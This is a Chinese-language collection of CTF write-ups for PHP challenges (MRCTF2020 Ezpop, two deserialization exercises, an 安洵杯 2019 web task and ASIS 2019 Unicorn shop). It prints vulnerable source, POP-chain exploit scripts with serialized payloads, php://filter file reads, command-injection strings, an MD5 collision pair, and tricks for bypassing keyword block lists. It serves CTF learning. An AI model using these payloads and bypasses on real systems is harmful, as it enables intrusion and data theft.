[MRCTF2020]Ezpop
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
//文件包含漏洞,可以通过伪协议读取flag
//__invoke() 当脚本尝试将对象调用为函数时触发
//所以把Modifier类调用为函数
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
//__toString 当一个对象被当作一个字符串被调用。
//__wakeup() 使用unserialize时触发
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
//__get() 用于从不可访问的属性读取数据
//#难以访问包括:(1)私有属性,(2)没有初始化的属性
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
?>
pop链
首先反序列化,调用wakeup方法,将this->source实例化为Show类,就调用tosring方法,如果将str实例化为Test,就能调用get方法,将get方法中的p赋值为Modifier类,就能调用invoke方法,最终调用文件包含函数,读取flag.php
<?php
class Modifier {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Test{
public $p;
}
class Show{
public $source;
public $str;
public function __construct(){
$this->str = new Test();
}
}
$a = new Show();
$a->source = new Show();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));
运行结果:O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BN%3B%7D%7D
base64解码
序列化3
<?php
error_reporting(0);
highlight_file(__FILE__);
class Person{
public $username='peguin';
public $password='123456';
public $file;
public function __construct($username,$password)
{
$this->username = $username;
$this->password = $password;
}
public function __destruct()
{
// TODO: Implement __destruct() method.
echo "your file is ".$this->file;
}
}
class Human{
public $a;
public function __construct($a){
$this->a = $a;
}
public function __toString()
{
if(preg_match('/ls|cat|more|flag/i',$this->a)){
// TODO: Implement __toString() method.
die('姿势骚一点');
}
else{
system($this->a);
}
return ("good");
}
}
$a = $_GET['code'];
unserialize($a);
?>
通过system函数读取flag
当cat被过滤时
more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行 nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep 1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings
<?php
class Person{
public $username='peguin';
public $password='123456';
public $file;
}
class Human{
public $a;
}
$n=new person();
$n->file=new human();
$n->file->a='sort /fla\g';//用sort查看
$c=serialize($n);
echo $c;
运行结果:O:6:"Person":3:{s:8:"username";s:6:"peguin";s:8:"password";s:6:"123456";s:4:"file";O:5:"Human":1:{s:1:"a";s:11:"sort /fla\g";}}
序列化4
<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
public $peguin;
public $source;
public function __construct($file){
$this->source = $file;
echo 'welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->peguin->close();
}
public function __wakeup(){
if(preg_match('/http|file|data|dict|\.\./i',$this->source)){
echo "hacker!";
$this->source = "index.php";
}
}
}
class good{
public $joker;
public function __call($name,$param){
system($this->joker);
}
}
$a = $_GET['cmd'];
unserialize($a);
?>
_call函数:当调用的方法不存在时触发
<?php
class test{
public $peguin;
public $source;
}
class good{
public $joker;
}
$a = new test();
$a->source=new test();
$a->source->peguin=new good();
$a->source->peguin->joker='ls';
echo serialize($a);
?>
先查看当前目录的文件
使用cat命令,页面无显示,这里用sort进行查看
$a->source->peguin->joker='sort flag.php';
运行结果:`O:4:"test":2:{s:6:"peguin";N;s:6:"source";O:4:"test":2:{s:6:"peguin";O:4:"good":1:{s:5:"joker";s:13:"sort flag.php";}s:6:"source";N;}}`
flag.php和flag.txt结果都一样
[安洵杯 2019]easy_web
网址中的img
经过了三重编码
hex->base64->base64
解码555.png
用index.php进行编码
得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
bp抓包
base64解码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
MD5强类型比较
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
接着是正则匹配,这里过滤了较多语句
可以用ca\t%20/flag进行绕过
[ASIS 2019]Unicorn shop
进去之后是一个购买页面
前三种商品无法购买
第四种商品购买时只允许出现一个字符
此题考点为unicode编码安全问题
https://www.compart.com/en/unicode/
输入thousand
代表的是五千
注意url编码
输入框中输入即可